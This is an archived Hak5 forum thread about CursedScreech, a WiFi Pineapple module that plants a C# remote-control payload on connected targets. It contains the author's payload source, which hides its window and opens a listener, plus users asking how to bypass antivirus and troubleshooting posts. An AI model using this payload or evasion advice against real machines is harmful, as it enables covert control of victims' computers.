sud0nick Posted July 15, 2018 Author Share Posted July 15, 2018 On 7/11/2018 at 6:11 PM, Ramez said: I was finally able to find the solution! Apart from everything else I did above, you need to add the 'targetlogs' folder to the follow directory: /pineapple/modules/CursedScreech/includes/forest It looks like for some reason the new firmware updates have been causing issues where the 2 folders (keys & targetlogs) do not get created automatically. Anyway, hope this helps! @Ramez thanks for finding this. I just verified that the targetlogs directory doesn't get created as it should. I'll work on a fix and push the update. I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue. Link to comment Share on other sites More sharing options...
Sebkinne Posted July 16, 2018 Share Posted July 16, 2018 1 hour ago, sud0nick said: @Ramez thanks for finding this. I just verified that the targetlogs directory doesn't get created as it should. I'll work on a fix and push the update. I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue. I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear. They'll need to be created programatically instead. Link to comment Share on other sites More sharing options...
sud0nick Posted July 16, 2018 Author Share Posted July 16, 2018 1 hour ago, Sebkinne said: I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear. They'll need to be created programatically instead. Yeah, it's my fault for not checking for their existence in the first place. Link to comment Share on other sites More sharing options...
blatayue Posted July 20, 2018 Share Posted July 20, 2018 You could also add a .gitkeep file to the directories as a placeholder so git doesn't remove them. Link to comment Share on other sites More sharing options...
Ramez Posted July 25, 2018 Share Posted July 25, 2018 I really appreciate the payload you have provided with the cursedscreech module, but I was just wondering, are there any other payloads out there that don't involve having to put it in an access key? In other words, the victim just has to download the executable file and run it, instead of having to do the whole generate access key thing. I've looked everywhere but can't seem to find any pre-configured payloads for the pineapple. Link to comment Share on other sites More sharing options...
sud0nick Posted July 26, 2018 Author Share Posted July 26, 2018 @Ramez when you generate the payload in Visual Studio just don't include the PA_Authorization class. Here's an example: using System; using System.Drawing; using System.Windows.Forms; using PineappleModules; namespace Payload { public partial class Form1 : Form { // ***************** REMOVE THIS LINE ***************** PA_Authorization pauth = new PA_Authorization(); // ***************** REMOVE THIS LINE ***************** public Form1() { InitializeComponent(); CursedScreech cs = new CursedScreech(); cs.startMulticaster("231.253.78.29", 19578); cs.setRemoteCertificateSerial("EF-BE-AD-DE"); cs.setRemoteCertificateHash("1234567890ABCDEF"); cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&"); } private void Form1_FormClosing(object sender, FormClosingEventArgs e) { e.Cancel = true; this.Hide(); } // ***************** REMOVE THIS FUNCTION ***************** private void accessKeyButton_Click(object sender, EventArgs e) { // Request an access key from the Pineapple string key = pauth.getAccessKey(); // Check if a key was returned string msg; if (key.Length > 0) { msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key; } else { msg = "Failed to retrieve an access key from the server. Please try again later."; } // Display message to the user MessageBox.Show(msg); } // ***************** REMOVE THIS FUNCTION ***************** } } The authorization function is just a trick anyway. There's no real dependency on the access key for Cursed Screech. However, the Payloader injection set in Portal Auth does require the access key to allow a target through Evil Portal. Maybe in the future I'll add a Payloader injection set that doesn't require the access key but for now you'll have to remove that functionality yourself. Link to comment Share on other sites More sharing options...
display-names Posted August 6, 2018 Share Posted August 6, 2018 first of all, thank you for the amazing support you have been giving. i do have a quick question. My target downloads and runs the payload fine, but although it shows up in de serverlog, Sein cant seem to make a connection. It never turns up in the target list in CursedScreech. does anyone have any idea's why?? Link to comment Share on other sites More sharing options...
sud0nick Posted August 6, 2018 Author Share Posted August 6, 2018 11 hours ago, display-names said: first of all, thank you for the amazing support you have been giving. i do have a quick question. My target downloads and runs the payload fine, but although it shows up in de serverlog, Sein cant seem to make a connection. It never turns up in the target list in CursedScreech. does anyone have any idea's why?? How is your target connected to the Pineapple? There's an interface setting in the Settings pane that lets you select which interface Sein should listen on. Make sure it's listening on the one that's connected to the same network as your target. Link to comment Share on other sites More sharing options...
display-names Posted August 7, 2018 Share Posted August 7, 2018 11 hours ago, sud0nick said: How is your target connected to the Pineapple? There's an interface setting in the Settings pane that lets you select which interface Sein should listen on. Make sure it's listening on the one that's connected to the same network as your target. Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense? Link to comment Share on other sites More sharing options...
sud0nick Posted August 8, 2018 Author Share Posted August 8, 2018 16 hours ago, display-names said: Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense? The PineAP interface is wlan1. Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works. Link to comment Share on other sites More sharing options...
display-names Posted August 8, 2018 Share Posted August 8, 2018 7 hours ago, sud0nick said: The PineAP interface is wlan1. Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works. Well, i only have the option to set it to br-lan, i do have the most up to date version though. i will just try to reinstall the module i guess. but just in case, any idea's why i cant set my Sein interface to anything except br-lan? EDIT 1: reinstall didnt help, too bad Link to comment Share on other sites More sharing options...
sud0nick Posted August 9, 2018 Author Share Posted August 9, 2018 Nevermind, wlan1 isn't available because by default it doesn't have an IP address. The only interfaces that appear in that dropdown are those that have an IP. br-lan should definitely be working. I'll look into it. Link to comment Share on other sites More sharing options...
display-names Posted August 10, 2018 Share Posted August 10, 2018 On 8/9/2018 at 2:58 AM, sud0nick said: Nevermind, wlan1 isn't available because by default it doesn't have an IP address. The only interfaces that appear in that dropdown are those that have an IP. br-lan should definitely be working. I'll look into it. hey there, i have tried to get it to work, but no luck, did you have any more luck?:) Link to comment Share on other sites More sharing options...
Aratim Posted February 15, 2019 Share Posted February 15, 2019 On 8/10/2018 at 3:41 PM, display-names said: hey there, i have tried to get it to work, but no luck, did you have any more luck?:) Hi there, I had the same problem. i studied the code (PinappleModules.cs) and found out that in "startMulticaster" in the while loop it set the "localIP" as wrong interface. so i had to disable the interface accordingly in the adapter settings - after all it chose the right interface. Link to comment Share on other sites More sharing options...
fan Posted May 6, 2019 Share Posted May 6, 2019 I'm looking for a way to crypt the payload that I build with visual studio to avoid detectionhelp me thanks Link to comment Share on other sites More sharing options...
sud0nick Posted May 8, 2019 Author Share Posted May 8, 2019 On 5/6/2019 at 11:35 AM, fan said: I'm looking for a way to crypt the payload that I build with visual studio to avoid detectionhelp me thanks You want to encrypt the payload for transmission only or while it's on disk too? If you encrypt it on disk to bypass AV you won't be able to execute it. To run it you would need to decrypt it and at that point AV would get you anyway. The point in providing an API for this module is to allow you to create your own payloads and work around AV however you choose. You could possibly obfuscate your code but I don't think encryption is what you want. Link to comment Share on other sites More sharing options...
fan Posted May 8, 2019 Share Posted May 8, 2019 Thanks for the answer, how can I use your payload to create another to bypass av. There is a video tutorial to learn how to do this.Any information on this subject would be appreciated Link to comment Share on other sites More sharing options...
cr4nk Posted October 18, 2019 Share Posted October 18, 2019 Already messaged Nick, but figured I would post a reply to this topic to see if anyone else might have some insight. I have downloaded the module on a freshly fac-resetted pineapple that has had the firmware upgrade. I ran opkg update and got the depends installed. Tried to get everything running after using papers to generate certs and created a C# payload, but Sein will not start. I checked the backend and it was yelling at me about ssl module for python, got pip, installed ssl, and still nothing. Pretty confused at this point. Link to comment Share on other sites More sharing options...
cr4nk Posted October 19, 2019 Share Posted October 19, 2019 root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py & root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last): File "sein.py", line 56, in <module> sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE)) socket.error: illegal IP address string passed to inet_aton Is what I am getting when I try to run it manually from the back end. Link to comment Share on other sites More sharing options...
Arratim Posted October 28, 2019 Share Posted October 28, 2019 Hi there, When I try to start kuro, the following entries appear in the Acitivity log: [+] Starting Kuro... [>] Cleaning up sockets Then it ends kuro and I cannot send any commands. in PortalAuth under payload the target is visible. I'm afraid I don't know how to fix this at the moment. Can anyone help? Thank you. Link to comment Share on other sites More sharing options...
sud0nick Posted December 27, 2019 Author Share Posted December 27, 2019 Version 1.6 is now available on GitHub! A PR has been submitted to the master repo. Here is the changelog: December 26, 2019 - Fixed bug in latest firmware that saved module settings in an invalid state causing issues when running Sein. Link to comment Share on other sites More sharing options...
JinJinks Posted June 16, 2020 Share Posted June 16, 2020 On 10/18/2019 at 11:00 PM, cr4nk said: root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py & root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last): File "sein.py", line 56, in <module> sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE)) socket.error: illegal IP address string passed to inet_aton Is what I am getting when I try to run it manually from the back end. Exact same problem that I've gotten! Is there any solution for this? Link to comment Share on other sites More sharing options...
sud0nick Posted July 18, 2020 Author Share Posted July 18, 2020 Hey everyone, I've decided that I'm not going to maintain this module any longer. My reasons are similar to those I posted in the PortalAuth thread but also because the techniques used in this old module are no longer effective. The payloads are caught pretty easily by AV now, even Windows Defender! I think it's time for this module to ride off into the sunset. As for the current issues poeple are facing with sein.py: socket.error: illegal IP address string passed to inet_aton This is probably because you haven't updated the interface setting from the module yet. You should select an interface and click the save button which will update the settings. You can also check /pineapple/modules/CursedScreech/includes/forest/settings to verify the correct IP address is set. You may have my Pineapple's local IP in there (192.168.0.138) which is throwing the exception. Link to comment Share on other sites More sharing options...
JediMasterX Posted July 25, 2020 Share Posted July 25, 2020 my Pineapple is just dead meat, seems like its dead for a while now... seems like the product and most importently the cummunity is no longer there... wake up HAK5 😓 JMX Link to comment Share on other sites More sharing options...
Struthian Posted July 25, 2020 Share Posted July 25, 2020 8 hours ago, JediMasterX said: my Pineapple is just dead meat, seems like its dead for a while now... seems like the product and most importently the cummunity is no longer there... wake up HAK5 😓 JMX "Dead meat" is not a very diagnostic description. What have you done to it? How did you attempt a reset? Don't tell people to wake up if you can't really articulate what is going on. Look at the reset process. Follow it. Make sure it is powered properly according to the documentation. Start following the process exactly. Attempt to access it (and explain what happened), then if that doesn't work, follow the reset process. Never expect people to care what you write when you didn't write anything descriptive yourself. That is important to any community. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.